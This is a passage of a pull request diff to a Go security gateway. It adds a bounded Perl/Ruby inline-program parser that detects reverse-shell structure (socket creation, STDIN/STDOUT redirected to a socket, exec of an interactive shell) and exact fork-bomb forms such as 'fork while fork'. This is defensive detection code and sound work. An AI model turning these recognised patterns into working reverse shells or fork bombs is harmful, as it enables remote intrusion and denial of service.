### PR TITLE
fix(gateway): reduce Perl and Ruby inline alert noise

### DIFF
--- a/internal/actionfacts/analyze.go
+++ b/internal/actionfacts/analyze.go
@@ -147,6 +147,7 @@ func analyze(input Input) Facts {
 			dialect = DialectArgv
 		}
 		parsed := analyzeStructuredArgv(argv, startID, 0, dialect)
+		expandBoundedInlineInterpreters(&parsed, 0)
 		classifyOutput(&parsed)
 		enforceAnalyzeAuthority(&parsed)
 		base.merge(parsed)
@@ -162,6 +163,7 @@ func analyze(input Input) Facts {
 			base.markAmbiguous(IssueConflictingSources)
 		}
 		parsed := parseCommandAs(command, dialect, startID, 0)
+		expandBoundedInlineInterpreters(&parsed, 0)
 		classifyOutput(&parsed)
 		enforceAnalyzeAuthority(&parsed)
 		base.merge(parsed)

--- a/internal/actionfacts/inline_interpreter.go
+++ b/internal/actionfacts/inline_interpreter.go
@@ -1,0 +1,1395 @@
+// Copyright 2026 Cisco Systems, Inc. and its affiliates
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package actionfacts
+
+import (
+	"math"
+	"net/netip"
+	"path"
+	"strconv"
+	"strings"
+	"unicode"
+	"unicode/utf8"
+)
+
+const (
+	maxInlineInterpreterTokens     = 512
+	maxInlineInterpreterStatements = 64
+	maxInlineInterpreterSymbols    = 32
+	maxInlineInterpreterDepth      = 16
+	maxInlineInterpreterCollection = 64
+)
+
+type inlineInvocationState uint8
+
+const (
+	inlineInvocationAbsent inlineInvocationState = iota
+	inlineInvocationInvalid
+	inlineInvocationLimited
+	inlineInvocationValid
+)
+
+type inlineInvocation struct {
+	program string
+	body    string
+}
+
+type inlineIR struct {
+	operations []OperationKind
+	paths      []inlinePathFact
+	network    []inlineNetworkFact
+	flows      []inlineFlowFact
+	children   []inlineChildSpec
+	opaque     bool
+	forkBomb   bool
+}
+
+type inlinePathFact struct {
+	access PathAccess
+	value  string
+}
+
+type inlineNetworkFact struct {
+	host string
+	port int64
+}
+
+type inlineFlowFact struct {
+	from DataKind
+	to   DataKind
+}
+
+type inlineChildSpec struct {
+	argv   []string
+	source string
+	exec   bool
+}
+
+// expandBoundedInlineInterpreters replaces the opaque Perl/Ruby -e boundary
+// only when both the complete invocation and complete inline program match a
+// closed grammar. Parsing first produces a private IR; no positive fact is
+// committed unless that parse succeeds in full.
+func expandBoundedInlineInterpreters(out *parseOutput, wrapperDepth int) {
+	if out == nil || out.status == StatusLimitExceeded {
+		return
+	}
+	owners := cloneCommands(out.commands)
+	for _, owner := range owners {
+		if owner.Program != "perl" && owner.Program != "ruby" ||
+			owner.Dialect != DialectPOSIX || owner.Effect != EffectExecute ||
+			!owner.ArgvComplete {
+			continue
+		}
+		if !inlineWrapperProgramIdentityExact(owner.Wrappers) {
+			out.markPartial(IssueUnknownOperandGrammar)
+			continue
+		}
+		invocation, state := parseInlineInterpreterInvocation(owner.Argv, owner.Program)
+		switch state {
+		case inlineInvocationAbsent:
+			continue
+		case inlineInvocationLimited:
+			out.markLimit(IssueInputLimit)
+			return
+		case inlineInvocationInvalid:
+			out.markPartial(IssueUnknownOperandGrammar)
+			continue
+		}
+
+		ir, ok := parseBoundedInlineProgram(invocation)
+		if !ok {
+			out.markPartial(IssueUnsupportedConstruct)
+			continue
+		}
+		effectiveDepth := wrapperDepth + len(owner.Wrappers)
+		if len(ir.children) > 0 && effectiveDepth >= maxWrapperDepth {
+			out.markLimit(IssueWrapperLimit)
+			return
+		}
+		children, ok := prepareInlineChildren(out, owner, ir.children, effectiveDepth)
+		if !ok || !preflightInlineCommit(out, ir, children) {
+			out.markLimit(IssueFactLimit)
+			return
+		}
+		commitInlineIR(out, owner, ir, children)
+		if ir.opaque {
+			out.markPartial(IssueOpaqueArtifact)
+		}
+	}
+}
+
+func prepareInlineChildren(
+	out *parseOutput,
+	owner CommandFact,
+	specs []inlineChildSpec,
+	wrapperDepth int,
+) ([]parseOutput, bool) {
+	children := make([]parseOutput, 0, len(specs))
+	nextID := out.nextID
+	for _, spec := range specs {
+		var child parseOutput
+		if spec.source != "" {
+			child = parsePOSIX(spec.source, nextID, wrapperDepth+1)
+		} else if len(spec.argv) > 0 {
+			child = analyzeStructuredArgv(spec.argv, nextID, wrapperDepth+1, DialectPOSIX)
+		} else {
+			return nil, false
+		}
+		if !inlineChildProgramIdentityExact(child) {
+			child.markPartial(IssueUnknownOperandGrammar)
+		}
+		expandBoundedInlineInterpreters(&child, wrapperDepth+1)
+		for index := range child.commands {
+			if child.commands[index].ParentCommandID == 0 {
+				child.commands[index].ParentCommandID = owner.ID
+			}
+			wrappers := cloneWrapperFacts(owner.Wrappers)
+			wrappers = append(wrappers, WrapperFact{
+				Executable: owner.Executable,
+				Argv:       cloneSlice(owner.Argv),
+			})
+			child.commands[index].Wrappers = append(
+				wrappers,
+				child.commands[index].Wrappers...,
+			)
+		}
+		children = append(children, child)
+		nextID = child.nextID
+	}
+	return children, true
+}
+
+func inlineChildProgramIdentityExact(child parseOutput) bool {
+	for _, command := range child.commands {
+		if command.Dialect != DialectPOSIX || command.Executable == "" || command.Program == "" {
+			continue
+		}
+		if !exactPOSIXProgramIdentity(command.Executable, command.Program) {
+			return false
+		}
+	}
+	return true
+}
+
+func inlineWrapperProgramIdentityExact(wrappers []WrapperFact) bool {
+	for _, wrapper := range wrappers {
+		if len(wrapper.Argv) == 0 || wrapper.Argv[0] != wrapper.Executable ||
+			!exactPOSIXProgramIdentity(wrapper.Executable, commandProgram(wrapper.Executable)) {
+			return false
+		}
+	}
+	return true
+}
+
+func exactPOSIXProgramIdentity(executable, program string) bool {
+	return program != "" && strings.TrimSpace(executable) == executable &&
+		executable != "" && !strings.Contains(executable, `\`) &&
+		(!strings.Contains(executable, "/") || trustedPOSIXExecutablePath(executable)) &&
+		path.Base(executable) == program
+}
+
+func trustedPOSIXExecutablePath(executable string) bool {
+	if executable == "" || path.Clean(executable) != executable {
+		return false
+	}
+	for _, prefix := range []string{"/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/"} {
+		if strings.HasPrefix(executable, prefix) && len(executable) > len(prefix) {
+			return true
+		}
+	}
+	return false
+}
+
+func cloneWrapperFacts(input []WrapperFact) []WrapperFact {
+	if len(input) == 0 {
+		return nil
+	}
+	cloned := make([]WrapperFact, len(input))
+	for index, wrapper := range input {
+		cloned[index] = WrapperFact{
+			Executable: wrapper.Executable,
+			Argv:       cloneSlice(wrapper.Argv),
+		}
+	}
+	return cloned
+}
+
+func preflightInlineCommit(out *parseOutput, ir inlineIR, children []parseOutput) bool {
+	commands := len(out.commands)
+	paths := len(out.paths) + len(ir.paths)
+	network := len(out.network) + len(ir.network)
+	flows := len(out.dataFlows) + len(ir.flows)
+	for _, child := range children {
+		commands += len(child.commands)
+		paths += len(child.paths)
+		network += len(child.network)
+		flows += len(child.dataFlows)
+	}
+	return commands <= maxCommands && paths <= maxPathFacts &&
+		network <= maxNetworkFacts && flows <= maxDataFlowFacts
+}
+
+func commitInlineIR(
+	out *parseOutput,
+	owner CommandFact,
+	ir inlineIR,
+	children []parseOutput,
+) {
+	ownerIndex := -1
+	for index := range out.commands {
+		if out.commands[index].ID == owner.ID {
+			ownerIndex = index
+			break
+		}
+	}
+	if ownerIndex < 0 {
+		out.markAmbiguous(IssueConflictingSources)
+		return
+	}
+	addOperation(&out.commands[ownerIndex], OperationExecute)
+	for _, operation := range ir.operations {
+		addOperation(&out.commands[ownerIndex], operation)
+	}
+	for _, fact := range ir.paths {
+		appendPath(out, owner.ID, fact.access, fact.value)
+	}
+	for _, fact := range ir.network {
+		out.appendNetwork(NetworkFact{
+			CommandID: owner.ID,
+			Action:    NetworkConnect,
+			Scheme:    "tcp",
+			Host:      fact.host,
+			Port:      fact.port,
+		})
+	}
+	for _, fact := range ir.flows {
+		flow := DataFlowFact{From: fact.from, To: fact.to}
+		if fact.from != DataNetwork {
+			flow.FromCommandID = owner.ID
+		}
+		if fact.to != DataNetwork {
+			flow.ToCommandID = owner.ID
+		}
+		out.appendDataFlow(flow)
+	}
+	for _, child := range children {
+		out.mergeNested(child)
+	}
+}
+
+// RecognizesPOSIXPerlInlineBody reports that the visible Perl -e body is fully
+// consumed by the bounded grammar. Like the rest of ActionFacts, this proof is
+// scoped to visible action input; callers must separately require authoritative
+// facts before using it to suppress a conservative fallback.
+func RecognizesPOSIXPerlInlineBody(command CommandFact) bool {
+	_, ok := recognizesBoundedInlineOwner(command, "perl")
+	return ok
+}
+
+// RecognizesPOSIXRubyInlineBody reports that the visible Ruby -e body is fully
+// consumed by the bounded grammar. Like the rest of ActionFacts, this proof is
+// scoped to visible action input; callers must separately require authoritative
+// facts before using it to suppress a conservative fallback.
+func RecognizesPOSIXRubyInlineBody(command CommandFact) bool {
+	_, ok := recognizesBoundedInlineOwner(command, "ruby")
+	return ok
+}
+
+func recognizesBoundedInlineOwner(command CommandFact, program string) (inlineInvocation, bool) {
+	if command.Dialect != DialectPOSIX || command.Effect != EffectExecute ||
+		!command.ArgvComplete || command.Program != program ||
+		!inlineWrapperProgramIdentityExact(command.Wrappers) {
+		return inlineInvocation{}, false
+	}
+	invocation, state := parseInlineInterpreterInvocation(command.Argv, program)
+	if state != inlineInvocationValid {
+		return inlineInvocation{}, false
+	}
+	_, ok := parseBoundedInlineProgram(invocation)
+	return invocation, ok
+}
+
+// ProvesPOSIXInlineInterpreterShellExec reports whether a fully parsed inline
+// owner contains one exact exec child which is the matching interactive POSIX
+// shell. A system child cannot satisfy this replacement proof. This is a
+// positive detection ingredient only; it must not establish whole-action
+// authority or suppress a conservative fallback by itself.
+func ProvesPOSIXInlineInterpreterShellExec(facts Facts, ownerID int64) bool {
+	var owner CommandFact
+	for _, command := range facts.Commands {
+		if command.ID == ownerID {
+			owner = command
+			break
+		}
+	}
+	if !RecognizesPOSIXPerlInlineBody(owner) && !RecognizesPOSIXRubyInlineBody(owner) {
+		return false
+	}
+	invocation, state := parseInlineInterpreterInvocation(owner.Argv, owner.Program)
+	if state != inlineInvocationValid {
+		return false
+	}
+	ir, ok := parseBoundedInlineProgram(invocation)
+	if !ok {
+		return false
+	}
+	var expected []string
+	for _, child := range ir.children {
+		if !child.exec || len(child.argv) == 0 || child.source != "" {
+			continue
+		}
+		if expected != nil {
+			return false
+		}
+		expected = child.argv
+	}
+	if expected == nil {
+		return false
+	}
+	matches := 0
+	for _, command := range facts.Commands {
+		if command.ParentCommandID == ownerID && equalStrings(command.Argv, expected) &&
+			exactPOSIXInteractiveShellExecutable(command.Executable) &&
+			ProvesPOSIXInteractiveShell(command) {
+			matches++
+		}
+	}
+	return matches == 1
+}
+
+func exactPOSIXInteractiveShellExecutable(executable string) bool {
+	if strings.TrimSpace(executable) != executable || executable == "" ||
+		strings.Contains(executable, `\`) ||
+		strings.Contains(executable, "/") && !trustedPOSIXExecutablePath(executable) {
+		return false
+	}
+	switch path.Base(executable) {
+	case "bash", "sh", "zsh", "dash", "ksh", "mksh":
+		return true
+	default:
+		return false
+	}
+}
+
+// ProvesPOSIXInlineInterpreterForkBomb recognizes only the two complete,
+// closed syntax forms accepted by the parser. Inert string contents cannot
+// satisfy it. This positive proof does not establish whole-action authority.
+func ProvesPOSIXInlineInterpreterForkBomb(command CommandFact) bool {
+	if command.Dialect != DialectPOSIX || command.Effect != EffectExecute ||
+		!command.ArgvComplete || !inlineWrapperProgramIdentityExact(command.Wrappers) {
+		return false
+	}
+	invocation, state := parseInlineInterpreterInvocation(command.Argv, command.Program)
+	if state != inlineInvocationValid {
+		return false
+	}
+	ir, ok := parseBoundedInlineProgram(invocation)
+	return ok && ir.forkBomb
+}
+
+func parseInlineInterpreterInvocation(argv []string, program string) (inlineInvocation, inlineInvocationState) {
+	if len(argv) < 2 || (program != "perl" && program != "ruby") ||
+		!exactPOSIXInlineExecutable(argv[0], program) {
+		return inlineInvocation{}, inlineInvocationAbsent
+	}
+	fragments := make([]string, 0, 2)
+	seenCode := false
+	seenRubyDisableGems := false
+	seenPerlNoSiteCustomize := false
+	for index := 1; index < len(argv); index++ {
+		argument := argv[index]
+		if program == "ruby" && argument == "--disable=gems,rubyopt" &&
+			!seenCode && !seenRubyDisableGems {
+			seenRubyDisableGems = true
+			continue
+		}
+		if program == "ruby" && argument == "--disable-gems" && !seenCode && !seenRubyDisableGems {
+			seenRubyDisableGems = true
+			continue
+		}
+		if program == "perl" && argument == "-T" && index == 1 {
+			continue
+		}
+		if program == "perl" && argument == "-f" && !seenCode && !seenPerlNoSiteCustomize {
+			seenPerlNoSiteCustomize = true
+			continue
+		}
+		if program == "perl" && !seenCode && (argument == "-w" || argument == "-W") {
+			continue
+		}
+		if argument == "-e" {
+			if index+1 >= len(argv) {
+				return inlineInvocation{}, inlineInvocationInvalid
+			}
+			index++
+			fragments = append(fragments, argv[index])
+			seenCode = true
+			continue
+		}
+		if strings.HasPrefix(argument, "-e") && len(argument) > 2 {
+			fragments = append(fragments, argument[2:])
+			seenCode = true
+			continue
+		}
+		if program == "perl" && !seenCode && strings.HasPrefix(argument, "-") &&
+			!strings.HasPrefix(argument, "--") {
+			bundle := argument[1:]
+			position := strings.IndexByte(bundle, 'e')
+			if position >= 0 && inlinePerlBundlePrefix(bundle[:position]) {
+				code := bundle[position+1:]
+				if code == "" {
+					if index+1 >= len(argv) {
+						return inlineInvocation{}, inlineInvocationInvalid
+					}
+					index++
+					code = argv[index]
+				}
+				fragments = append(fragments, code)
+				seenCode = true
+				continue
+			}
+		}
+		state := inlineInvocationInvalid
+		if !seenCode && !inlineArgumentLooksLikeCodeOption(argument, program) {
+			state = inlineInvocationAbsent
+		}
+		return inlineInvocation{}, state
+	}
+	if !seenCode || len(fragments) == 0 {
+		return inlineInvocation{}, inlineInvocationAbsent
+	}
+	body := strings.Join(fragments, "\n")
+	if body == "" {
+		return inlineInvocation{}, inlineInvocationInvalid
+	}
+	if len(body) > maxInlineInterpreterBytes {
+		return inlineInvocation{}, inlineInvocationLimited
+	}
+	if !utf8.ValidString(body) || strings.IndexByte(body, 0) >= 0 {
+		return inlineInvocation{}, inlineInvocationInvalid
+	}
+	return inlineInvocation{program: program, body: body}, inlineInvocationValid
+}
+
+func exactPOSIXInlineExecutable(executable, program string) bool {
+	return exactPOSIXProgramIdentity(executable, program)
+}
+
+func inlinePerlBundlePrefix(prefix string) bool {
+	if prefix == "" {
+		return true
+	}
+	for _, char := range prefix {
+		if char != 'w' && char != 'W' {
+			return false
+		}
+	}
+	return true
+}
+
+func inlineArgumentLooksLikeCodeOption(argument, program string) bool {
+	if argument == "-e" || strings.HasPrefix(argument, "-e") {
+		return true
+	}
+	return program == "perl" && strings.HasPrefix(argument, "-") &&
+		strings.ContainsRune(argument[1:], 'e')
+}
+
+type inlineTokenKind uint8
+
+const (
+	inlineTokenEOF inlineTokenKind = iota
+	inlineTokenIdent
+	inlineTokenVariable
+	inlineTokenNumber
+	inlineTokenString
+	inlineTokenSymbol
+)
+
+type inlineToken struct {
+	kind inlineTokenKind
+	text string
+}
+
+func lexInlineProgram(source, program string) ([]inlineToken, bool) {
+	tokens := make([]inlineToken, 0, 64)
+	for index := 0; index < len(source); {
+		char := source[index]
+		if char < utf8.RuneSelf && unicode.IsSpace(rune(char)) {
+			// Ruby line breaks are statement boundaries unless the surrounding
+			// syntax proves continuation. The bounded grammar deliberately does
+			// not model that full layout rule, so reject visible newlines instead
+			// of joining a zero-argument call to a following parenthesized value.
+			if program == "ruby" && (char == '\n' || char == '\r') {
+				return nil, false
+			}
+			index++
+			continue
+		}
+		if char >= utf8.RuneSelf {
+			return nil, false
+		}
+		if isInlineIdentStart(char) {
+			start := index
+			index++
+			for index < len(source) {
+				if isInlineIdentContinue(source[index]) {
+					index++
+					continue
+				}
+				if index+2 < len(source) && source[index] == ':' && source[index+1] == ':' &&
+					isInlineIdentStart(source[index+2]) {
+					index += 2
+					continue
+				}
+				break
+			}
+			tokens = append(tokens, inlineToken{kind: inlineTokenIdent, text: source[start:index]})
+		} else if char == '$' {
+			start := index
+			index++
+			if index >= len(source) || !isInlineIdentStart(source[index]) {
+				return nil, false
+			}
+			for index < len(source) && isInlineIdentContinue(source[index]) {
+				index++
+			}
+			tokens = append(tokens, inlineToken{kind: inlineTokenVariable, text: source[start:index]})
+		} else if char >= '0' && char <= '9' {
+			start := index
+			for index < len(source) && source[index] >= '0' && source[index] <= '9' {
+				index++
+			}
+			tokens = append(tokens, inlineToken{kind: inlineTokenNumber, text: source[start:index]})
+		} else if char == '\'' || char == '"' {
+			value, next, ok := lexInlineString(source, index, program)
+			if !ok {
+				return nil, false
+			}
+			tokens = append(tokens, inlineToken{kind: inlineTokenString, text: value})
+			index = next
+		} else {
+			symbol := string(char)
+			if index+1 < len(source) {
+				pair := source[index : index+2]
+				if program == "perl" && (pair == "++" || pair == "--") {
+					return nil, false
+				}
+				switch pair {
+				case "=>", "->", ">>", "<&", ">&", "==", "!=", "<=", ">=", "&&", "||":
+					symbol = pair
+					index++
+				}
+			}
+			if !strings.Contains("()[]{},;.=+-*/<>", string(symbol[0])) {
+				return nil, false
+			}
+			tokens = append(tokens, inlineToken{kind: inlineTokenSymbol, text: symbol})
+			index++
+		}
+		if len(tokens) > maxInlineInterpreterTokens {
+			return nil, false
+		}
+	}
+	tokens = append(tokens, inlineToken{kind: inlineTokenEOF})
+	return tokens, true
+}
+
+func lexInlineString(source string, start int, program string) (string, int, bool) {
+	quote := source[start]
+	var value strings.Builder
+	for index := start + 1; index < len(source); index++ {
+		char := source[index]
+		if char == quote {
+			return value.String(), index + 1, true
+		}
+		if quote == '"' {
+			if char == '$' || program == "perl" && char == '@' ||
+				program == "ruby" && char == '#' && index+1 < len(source) &&
+					(source[index+1] == '{' || source[index+1] == '@' || source[index+1] == '$') {
+				return "", 0, false
+			}
+		}
+		if char == '\\' {
+			index++
+			if index >= len(source) {
+				return "", 0, false
+			}
+			escaped := source[index]
+			if quote == '\'' {
+				if escaped != '\\' && escaped != '\'' {
+					return "", 0, false
+				}
+				value.WriteByte(escaped)
+				continue
+			}
+			switch escaped {
+			case '\\', '"':
+				value.WriteByte(escaped)
+			case 'n':
+				value.WriteByte('\n')
+			case 'r':
+				value.WriteByte('\r')
+			case 't':
+				value.WriteByte('\t')
+			default:
+				return "", 0, false
+			}
+			continue
+		}
+		if char < 0x20 && char != '\t' {
+			return "", 0, false
+		}
+		value.WriteByte(char)
+	}
+	return "", 0, false
+}
+
+func isInlineIdentStart(char byte) bool {
+	return char == '_' || char >= 'a' && char <= 'z' || char >= 'A' && char <= 'Z'
+}
+
+func isInlineIdentContinue(char byte) bool {
+	return isInlineIdentStart(char) || char >= '0' && char <= '9'
+}
+
+type inlineValueKind uint8
+
+const (
+	inlineValueInvalid inlineValueKind = iota
+	inlineValueString
+	inlineValueInteger
+	inlineValueArray
+	inlineValueHandle
+	inlineValueSocket
+)
+
+type inlineValue struct {
+	kind  inlineValueKind
+	text  string
+	num   int64
+	items []inlineValue
+}
+
+type inlineParser struct {
+	program          string
+	tokens           []inlineToken
+	position         int
+	depth            int
+	statements       int
+	symbols          map[string]inlineValue
+	seenSocketImport bool
+	ir               inlineIR
+}
+
+func parseBoundedInlineProgram(invocation inlineInvocation) (inlineIR, bool) {
+	tokens, ok := lexInlineProgram(invocation.body, invocation.program)
+	if !ok {
+		return inlineIR{}, false
+	}
+	parser := inlineParser{
+		program: invocation.program,
+		tokens:  tokens,
+		symbols: make(map[string]inlineValue),
+	}
+	if parser.parseExactForkBomb() {
+		parser.ir.forkBomb = true
+		return parser.ir, true
+	}
+	for !parser.atEOF() {
+		if parser.statements >= maxInlineInterpreterStatements {
+			return inlineIR{}, false
+		}
+		parser.statements++
+		terminal, ok := parser.parseStatement()
+		if !ok {
+			return inlineIR{}, false
+		}
+		separators := 0
+		for parser.consumeSymbol(";") {
+			separators++
+		}
+		if terminal && !parser.atEOF() || !parser.atEOF() && separators == 0 {
+			return inlineIR{}, false
+		}
+	}
+	if parser.statements == 0 {
+		return inlineIR{}, false
+	}
+	return parser.ir, true
+}
+
+func (parser *inlineParser) parseExactForkBomb() bool {
+	end := len(parser.tokens) - 1
+	if end > 0 && parser.tokens[end-1].kind == inlineTokenSymbol &&
+		parser.tokens[end-1].text == ";" {
+		end--
+	}
+	if parser.program == "perl" && end == 3 &&
+		parser.tokens[0].kind == inlineTokenIdent && parser.tokens[0].text == "fork" &&
+		parser.tokens[1].kind == inlineTokenIdent && parser.tokens[1].text == "while" &&
+		parser.tokens[2].kind == inlineTokenIdent && parser.tokens[2].text == "fork" {
+		parser.position = len(parser.tokens) - 1
+		return true
+	}
+	if parser.program == "ruby" && end == 4 &&
+		parser.tokens[0].kind == inlineTokenIdent && parser.tokens[0].text == "loop" &&
+		parser.tokens[1].kind == inlineTokenSymbol && parser.tokens[1].text == "{" &&
+		parser.tokens[2].kind == inlineTokenIdent && parser.tokens[2].text == "fork" &&
+		parser.tokens[3].kind == inlineTokenSymbol && parser.tokens[3].text == "}" {
+		parser.position = len(parser.tokens) - 1
+		return true
+	}
+	return false
+}
+
+func (parser *inlineParser) parseStatement() (bool, bool) {
+	if parser.peek().kind != inlineTokenIdent {
+		return false, false
+	}
+	if parser.program == "perl" {
+		return parser.parsePerlStatement()
+	}
+	return parser.parseRubyStatement()
+}
+
+func (parser *inlineParser) parsePerlStatement() (bool, bool) {
+	switch parser.peekText() {
+	case "my":
+		return false, parser.parsePerlAssignment()
+	case "print", "warn":
+		return false, parser.parseDiagnostic()
+	case "open":
+		return false, parser.parsePerlOpen()
+	case "use":
+		return false, parser.parsePerlImport()
+	case "system":
+		return false, parser.parseChildCall(false)
+	case "exec":
+		return true, parser.parseChildCall(true)
+	default:
+		return false, false
+	}
+}
+
+func (parser *inlineParser) parseRubyStatement() (bool, bool) {
+	switch parser.peekText() {
+	case "require":
+		return false, parser.parseRubyImport()
+	case "puts", "print", "p", "warn":
+		return false, parser.parseDiagnostic()
+	case "File":
+		return false, parser.parseRubyFileCall()
+	case "STDIN", "STDOUT":
+		return false, parser.parseRubyReopen()
+	case "system":
+		return false, parser.parseChildCall(false)
+	case "exec":
+		return true, parser.parseChildCall(true)
+	default:
+		if parser.peek().kind == inlineTokenIdent && parser.peekN(1).text == "=" {
+			return false, parser.parseRubyAssignment()
+		}
+		return false, false
+	}
+}
+
+func (parser *inlineParser) parsePerlAssignment() bool {
+	if !parser.consumeIdent("my") || parser.peek().kind != inlineTokenVariable {
+		return false
+	}
+	name := parser.take().text
+	if !parser.consumeSymbol("=") || parser.symbolDefined(name) {
+		return false
+	}
+	if parser.peekText() == "IO::Socket::INET" {
+		value, ok := parser.parsePerlSocket()
+		if !ok {
+			return false
+		}
+		return parser.defineSymbol(name, value)
+	}
+	value, ok := parser.parseExpression()
+	return ok && value.kind != inlineValueSocket && value.kind != inlineValueHandle &&
+		parser.defineSymbol(name, value)
+}
+
+func (parser *inlineParser) parseRubyAssignment() bool {
+	name := parser.take().text
+	if !validInlineRubyLocal(name) ||
+		!parser.consumeSymbol("=") || parser.symbolDefined(name) {
+		return false
+	}
+	if parser.peekText() == "TCPSocket" {
+		value, ok := parser.parseRubySocket()
+		if !ok {
+			return false
+		}
+		return parser.defineSymbol(name, value)
+	}
+	value, ok := parser.parseExpression()
+	return ok && value.kind != inlineValueSocket && value.kind != inlineValueHandle &&
+		parser.defineSymbol(name, value)
+}
+
+func validInlineRubyLocal(name string) bool {
+	if name == "" || strings.Contains(name, "::") ||
+		name[0] != '_' && (name[0] < 'a' || name[0] > 'z') ||
+		len(name) == 2 && name[0] == '_' && name[1] >= '1' && name[1] <= '9' {
+		return false
+	}
+	switch name {
+	case "BEGIN", "END", "__ENCODING__", "__FILE__", "__LINE__",
+		"alias", "and", "begin", "break", "case", "class",
+		"def", "defined", "do", "else", "elsif", "end", "ensure", "false",
+		"for", "if", "in", "module", "next", "nil", "not", "or", "redo",
+		"rescue", "retry", "return", "self", "super", "then", "true", "undef",
+		"unless", "until", "when", "while", "yield":
+		return false
+	default:
+		return true
+	}
+}
+
+func (parser *inlineParser) parseDiagnostic() bool {
+	parser.take()
+	parenthesized := parser.consumeSymbol("(")
+	count := 0
+	for {
+		if parenthesized && parser.peekText() == ")" {
+			break
+		}
+		if !parenthesized && (parser.peekText() == ";" || parser.atEOF()) {
+			break
+		}
+		value, ok := parser.parseExpression()
+		if !ok || value.kind == inlineValueSocket || value.kind == inlineValueHandle {
+			return false
+		}
+		count++
+		if !parser.consumeSymbol(",") {
+			break
+		}
+		if parser.program == "ruby" && !parenthesized &&
+			(parser.peekText() == ";" || parser.atEOF()) {
+			return false
+		}
+	}
+	if count == 0 {
+		return false
+	}
+	return !parenthesized || parser.consumeSymbol(")")
+}
+
+func (parser *inlineParser) parsePerlImport() bool {
+	if !parser.consumeIdent("use") || !parser.consumeIdent("IO::Socket::INET") ||
+		parser.seenSocketImport {
+		return false
+	}
+	parser.seenSocketImport = true
+	parser.ir.opaque = true
+	return true
+}
+
+func (parser *inlineParser) parseRubyImport() bool {
+	if !parser.consumeIdent("require") || parser.peek().kind != inlineTokenString ||
+		parser.peek().text != "socket" || parser.seenSocketImport {
+		return false
+	}
+	parser.take()
+	parser.seenSocketImport = true
+	parser.ir.opaque = true
+	return true
+}
+
+func (parser *inlineParser) parsePerlSocket() (inlineValue, bool) {
+	if !parser.seenSocketImport || !parser.consumeIdent("IO::Socket::INET") ||
+		!parser.consumeSymbol("->") || !parser.consumeIdent("new") ||
+		!parser.consumeSymbol("(") {
+		return inlineValue{}, false
+	}
+	values := make(map[string]inlineValue, 3)
+	for {
+		if parser.peek().kind != inlineTokenIdent {
+			return inlineValue{}, false
+		}
+		key := parser.take().text
+		if _, exists := values[key]; exists || !parser.consumeSymbol("=>") {
+			return inlineValue{}, false
+		}
+		value, ok := parser.parseExpression()
+		if !ok {
+			return inlineValue{}, false
+		}
+		values[key] = value
+		if !parser.consumeSymbol(",") {
+			break
+		}
+	}
+	if !parser.consumeSymbol(")") || len(values) != 3 ||
+		values["PeerAddr"].kind != inlineValueString ||
+		values["PeerPort"].kind != inlineValueInteger ||
+		values["Proto"].kind != inlineValueString || values["Proto"].text != "tcp" {
+		return inlineValue{}, false
+	}
+	if address, err := netip.ParseAddr(values["PeerAddr"].text); err == nil && address.Is6() {
+		// IO::Socket::INET is an AF_INET interface. IPv6 literals require a
+		// different module whose semantics are outside this bounded grammar.
+		return inlineValue{}, false
+	}
+	if !parser.addNetwork(values["PeerAddr"].text, values["PeerPort"].num) {
+		return inlineValue{}, false
+	}
+	return inlineValue{kind: inlineValueSocket}, true
+}
+
+func (parser *inlineParser) parseRubySocket() (inlineValue, bool) {
+	if !parser.seenSocketImport || !parser.consumeIdent("TCPSocket") ||
+		!parser.consumeSymbol(".") || !parser.consumeIdent("new") ||
+		!parser.consumeSymbol("(") {
+		return inlineValue{}, false
+	}
+	host, hostOK := parser.parseExpression()
+	if !hostOK || !parser.consumeSymbol(",") {
+		return inlineValue{}, false
+	}
+	port, portOK := parser.parseExpression()
+	if !portOK || !parser.consumeSymbol(")") || host.kind != inlineValueString ||
+		port.kind != inlineValueInteger || !parser.addNetwork(host.text, port.num) {
+		return inlineValue{}, false
+	}
+	return inlineValue{kind: inlineValueSocket}, true
+}
+
+func (parser *inlineParser) addNetwork(host string, port int64) bool {
+	if !validNetworkHost(host) || port < 1 || port > 65535 {
+		return false
+	}
+	parser.addOperation(OperationConnect)
+	parser.ir.network = append(parser.ir.network, inlineNetworkFact{host: host, port: port})
+	return true
+}
+
+func (parser *inlineParser) parsePerlOpen() bool {
+	if !parser.consumeIdent("open") || !parser.consumeSymbol("(") {
+		return false
+	}
+	if parser.consumeIdent("my") {
+		if parser.peek().kind != inlineTokenVariable {
+			return false
+		}
+		handle := parser.take().text
+		if parser.symbolDefined(handle) || !parser.consumeSymbol(",") {
+			return false
+		}
+		mode, modeOK := parser.parseExpression()
+		if !modeOK || mode.kind != inlineValueString || !parser.consumeSymbol(",") {
+			return false
+		}
+		pathValue, pathOK := parser.parseExpression()
+		if !pathOK || pathValue.kind != inlineValueString || !parser.consumeSymbol(")") ||
+			!validInlinePOSIXPath(pathValue.text) {
+			return false
+		}
+		var operation OperationKind
+		var access PathAccess
+		switch mode.text {
+		case "<":
+			operation, access = OperationRead, PathAccessRead
+		case ">":
+			operation, access = OperationWrite, PathAccessWrite
+		case ">>":
+			operation, access = OperationAppend, PathAccessAppend
+		default:
+			return false
+		}
+		parser.addOperation(operation)
+		parser.ir.paths = append(parser.ir.paths, inlinePathFact{access: access, value: pathValue.text})
+		return parser.defineSymbol(handle, inlineValue{kind: inlineValueHandle})
+	}
+	if parser.peek().kind != inlineTokenIdent {
+		return false
+	}
+	descriptor := parser.take().text
+	if descriptor != "STDIN" && descriptor != "STDOUT" || !parser.consumeSymbol(",") {
+		return false
+	}
+	mode, modeOK := parser.parseExpression()
+	if !modeOK || mode.kind != inlineValueString || !parser.consumeSymbol(",") ||
+		parser.peek().kind != inlineTokenVariable {
+		return false
+	}
+	socket := parser.take().text
+	if !parser.consumeSymbol(")") || parser.symbols[socket].kind != inlineValueSocket {
+		return false
+	}
+	if descriptor == "STDIN" && mode.text == "<&" {
+		parser.ir.flows = append(parser.ir.flows, inlineFlowFact{from: DataNetwork, to: DataStdin})
+		return true
+	}
+	if descriptor == "STDOUT" && mode.text == ">&" {
